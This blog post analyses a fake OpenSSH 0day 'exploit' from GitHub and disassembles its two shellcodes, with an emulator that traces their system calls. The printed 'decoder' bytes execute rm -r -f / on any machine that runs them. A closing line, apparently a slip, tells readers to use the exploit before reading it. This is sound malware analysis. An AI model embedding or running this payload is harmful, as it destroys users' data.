A quick look at a fake 0day exploit :)

Just a normal day at work: I was searching for vulnerabilities in OpenSSH 5.3 and, surprisingly, found an RCE 0day exploit on GitHub. I took a look at the exploit code before compiling it. Strangely, the exploit code was very simple, especially the shellcode.

There are two shellcodes in the exploit. I disassembled both with objdump and added comments to the assembly.

decoder:

```sh
# Python 2: print appends a trailing newline, which is the stray 0x0a byte at the end of the dump
python -c 'print "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80"' > decoder.bin
objdump -D -b binary -M intel -m i386 decoder.bin
```
```asm
00000000 <.data>:
 0: 6a 0b                push 0xb
 2: 58                   pop eax           // eax = 11: sys_execve
 3: 99                   cdq               // edx = 0 (sign of eax); reused as NUL, NULL and envp
 4: 52                   push edx          // NUL terminator
 5: 6a 2f                push 0x2f         // "/"
 7: 89 e7                mov edi,esp       // edi -> "/"
 9: 52                   push edx
 a: 66 68 2d 66          pushw 0x662d      // "-f"
 e: 89 e6                mov esi,esp       // esi -> "-f"
10: 52                   push edx
11: 66 68 2d 72          pushw 0x722d      // "-r"
15: 89 e1                mov ecx,esp       // ecx -> "-r"
17: 52                   push edx
18: 68 2f 2f 72 6d       push 0x6d722f2f   // "//rm"
1d: 68 2f 62 69 6e       push 0x6e69622f   // "/bin"
22: 89 e3                mov ebx,esp       // ebx -> "/bin//rm" (filename)
24: 52                   push edx          // argv[4] = NULL
25: 57                   push edi          // argv[3] = "/"
26: 56                   push esi          // argv[2] = "-f"
27: 51                   push ecx          // argv[1] = "-r"
28: 53                   push ebx          // argv[0] = "/bin//rm"
29: 89 e1                mov ecx,esp       // ecx -> argv
2b: cd 80                int 0x80          // execve("/bin//rm", ["/bin//rm", "-r", "-f", "/"], NULL)
2d: 0a                   .byte 0xa         // trailing newline from python's print, not part of the shellcode
```

rootshell:

```sh
python -c 'print "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80"' > rootshell.bin
objdump -D -b binary -M intel -m i386 rootshell.bin
```
```asm
00000000 <.data>:
 0: 31 d2                xor edx,edx
 2: b2 0a                mov dl,0xa        // edx = 10: byte count for sys_write
 4: b9 6f 75 21 0a       mov ecx,0xa21756f // "ou!\n"
 9: 51                   push ecx
 a: b9 63 6b 20 79       mov ecx,0x79206b63 // "ck y"
 f: 51                   push ecx
10: 66 b9 66 75          mov cx,0x7566     // "fu"
14: 66 51                push cx           // stack now holds "fuck you!\n"
16: 31 c9                xor ecx,ecx       // redundant, overwritten on the next line
18: 89 e1                mov ecx,esp       // ecx -> buffer
1a: 31 db                xor ebx,ebx
1c: b3 01                mov bl,0x1        // sys_write ebx: fd = 1 (stdout)
1e: 31 c0                xor eax,eax
20: b0 04                mov al,0x4        // eax = 4: sys_write
22: cd 80                int 0x80          // write(1, "fuck you!\n", 10)
24: 31 c0                xor eax,eax
26: 31 db                xor ebx,ebx       // ebx = 0: exit status
28: 40                   inc eax           // eax = 1: sys_exit
29: cd 80                int 0x80          // exit(0)
2b: 0a                   .byte 0xa         // trailing newline from python's print, not part of the shellcode
```
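To confirm that reading without executing either payload, here is an added example that is not from the post or from the exploit repository: a small Python interpreter for just the instruction subset these two shellcodes use (push, pop, mov, xor, cdq, inc, int 0x80). It builds the strings on a modelled stack and reports the system calls each payload would make. The fake stack address, the register model and the tuple format it returns are my own assumptions.

```python
import struct
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # x86 register encoding order
SYSCALLS = {1: "exit", 4: "write", 11: "execve"}  # Linux i386 numbers used by the two payloads
STACK_TOP, STACK_SIZE = 0xbffff000, 0x1000  # constructed fake stack; any address would do
def emulate(code):
    # Interpret the push/pop/mov/xor/cdq/inc/int subset these shellcodes use on a
    # modelled stack and return the syscalls they would issue, strings resolved.
    mem, r, calls, i = bytearray(STACK_SIZE), dict.fromkeys(REGS, 0), [], 0
    r["esp"] = STACK_TOP
    off = lambda addr: addr - (STACK_TOP - STACK_SIZE)  # address -> index into mem
    rd = lambda addr: struct.unpack_from("<I", mem, off(addr))[0]  # read a dword
    cstr = lambda addr: mem[off(addr):mem.index(0, off(addr))].decode("latin-1")  # NUL-terminated string
    def push(data):
        r["esp"] -= len(data); mem[off(r["esp"]):off(r["esp"]) + len(data)] = data
    while i < len(code):
        op = code[i]
        if op == 0x66:  # operand-size prefix: the 16-bit pushw imm16 / push cx / mov cx,imm16 forms
            op, i = code[i + 1], i + 1
            if op == 0x68: push(code[i + 1:i + 3]); i += 3
            elif 0x50 <= op <= 0x57: push(struct.pack("<H", r[REGS[op - 0x50]] & 0xffff)); i += 1
            elif 0xb8 <= op <= 0xbf:  # mov r16, imm16 keeps the upper half of the register
                r[REGS[op - 0xb8]] = (r[REGS[op - 0xb8]] & 0xffff0000) | struct.unpack_from("<H", code, i + 1)[0]; i += 3
            else: raise ValueError(f"unsupported opcode 66 {op:02x}")
        elif op == 0x68: push(code[i + 1:i + 5]); i += 5  # push imm32
        elif op == 0x6a: push(struct.pack("<i", struct.unpack_from("<b", code, i + 1)[0])); i += 2  # push imm8, sign-extended
        elif 0x50 <= op <= 0x57: push(struct.pack("<I", r[REGS[op - 0x50]])); i += 1  # push r32
        elif 0x58 <= op <= 0x5f: r[REGS[op - 0x58]] = rd(r["esp"]); r["esp"] += 4; i += 1  # pop r32
        elif 0x40 <= op <= 0x47: r[REGS[op - 0x40]] = (r[REGS[op - 0x40]] + 1) & 0xffffffff; i += 1  # inc r32
        elif 0xb8 <= op <= 0xbf: r[REGS[op - 0xb8]] = struct.unpack_from("<I", code, i + 1)[0]; i += 5  # mov r32, imm32
        elif 0xb0 <= op <= 0xb3: r[REGS[op - 0xb0]] = (r[REGS[op - 0xb0]] & 0xffffff00) | code[i + 1]; i += 2  # mov al/cl/dl/bl, imm8
        elif op == 0x99: r["edx"] = 0xffffffff if r["eax"] >> 31 else 0; i += 1  # cdq: sign-extend eax into edx
        elif op in (0x89, 0x31) and code[i + 1] >= 0xc0:  # mov / xor r32, r32 (register-direct ModRM only)
            dst, src = REGS[code[i + 1] & 7], REGS[(code[i + 1] >> 3) & 7]
            r[dst] = r[src] if op == 0x89 else r[dst] ^ r[src]; i += 2
        elif op == 0xcd and code[i + 1] == 0x80:  # int 0x80: Linux i386 syscall, number in eax
            name = SYSCALLS.get(r["eax"], f"syscall_{r['eax']}"); i += 2
            if name == "execve":  # execve(ebx=path, ecx=argv, edx=envp); argv ends at a NULL pointer
                argv, p = [], r["ecx"]
                while rd(p): argv.append(cstr(rd(p))); p += 4
                calls.append((name, cstr(r["ebx"]), argv))
            elif name == "write":  # write(ebx=fd, ecx=buf, edx=count)
                calls.append((name, r["ebx"], mem[off(r["ecx"]):off(r["ecx"]) + r["edx"]].decode("latin-1")))
            else: calls.append((name, r["ebx"]))  # exit(ebx=status), or an unknown number
            if name in ("execve", "exit"): break  # neither returns to the shellcode
        else: raise ValueError(f"unsupported opcode {op:02x} at offset {i:#x}")
    return calls
# Both payloads exactly as given in the post (without the trailing 0x0a that python's print adds).
DECODER = bytes.fromhex("6a0b 58 99 52 6a2f 89e7 52 66682d66 89e6 52 66682d72 89e1 52 682f2f726d 682f62696e 89e3 52 57 56 51 53 89e1 cd80")
ROOTSHELL = bytes.fromhex("31d2 b20a b96f75210a 51 b9636b2079 51 66b96675 6651 31c9 89e1 31db b301 31c0 b004 cd80 31c0 31db 40 cd80")
```

`emulate(DECODER)` returns the single execve of `/bin//rm` with argv `["/bin//rm", "-r", "-f", "/"]`, and `emulate(ROOTSHELL)` returns the write of `"fuck you!\n"` to fd 1 followed by exit(0); any opcode outside the modelled subset raises instead of being guessed at.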

That’s all. A fake 0day exploit: the "decoder" is an execve of /bin//rm -r -f / on whatever machine runs it, and the "rootshell" just writes an insult to stdout and exits.

After some searching, I found an older post on Pastebin and another person’s analysis blog. There was also already an issue on GitHub referencing the same blog. It seems I got too involved in the research without searching for related information first :)

All in all, it was a short, relaxing moment during Monday’s working hours. Use the exploit before you read it and understand it.

BTW, no RCE exploit TAT.